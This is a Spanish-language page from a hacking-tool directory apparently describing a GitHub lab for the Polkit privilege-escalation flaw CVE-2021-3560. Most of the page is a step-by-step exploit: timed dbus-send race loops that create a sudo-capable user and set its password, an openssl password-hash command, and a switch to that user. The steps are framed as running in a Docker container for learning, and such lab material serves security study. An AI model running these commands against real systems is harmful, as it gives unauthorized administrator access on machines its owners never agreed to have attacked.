Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-3560-Polkit-Privilege-Escalation | Kitploit
Herramientas/GitHubGitHub/markyu0401/cve-2021-3560-polkit-privilege-escalation
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubmarkyu0401/cve-2021-3560-polkit-privilege-escalation

CVE-2021-3560-Polkit-Privilege-Escalation

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 2 añosAún no revisado

CVE-2021-3560-Polkit-Privilege-Escalation

por Mark, Qingchen Yu Para construir el contenedor con

root@kitploit:~
docker build -t <image tag of your choice> .

Para ejecutar el contenedor

root@kitploit:~
docker run -it <image tag name>
  1. comience con start.sh

  2. Mida el tiempo de ejecución: Anote el tiempo 'real' y calcule su mitad.

    root@kitploit:~
    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
    
  3. Cree un usuario con privilegios sudo: Reemplace X.XXX con la mitad del tiempo 'real' anterior porque queremos que el proceso se interrumpa a la mitad el comando se ejecutará como un bucle de 10000 veces Puede que necesite ejecutar este paso varias veces

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
    
  4. Compruebe la creación del usuario id samurai Debería mostrar que el usuario samurai existe y mostrar sus permisos. Si no es así, ejecute el paso 2 nuevamente.

  5. Genere el hash de la contraseña: en este caso, la contraseña sería 'iamsamurai' Anote el hash generado.

    root@kitploit:~
    openssl passwd -5 iamsamurai
    
  6. Establezca la contraseña para el nuevo usuario: Reemplace X.XXX con la duración de sleep y 'Password Hash' por el hash del paso 4. Reemplace UUUU por el ID de usuario de 'samurai'

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
    
  7. Cambie al nuevo usuario con la contraseña que creó en el paso 4. su - samurai

    Ahora debería poder usar 'sudo con este usuario'.

Descargar herramienta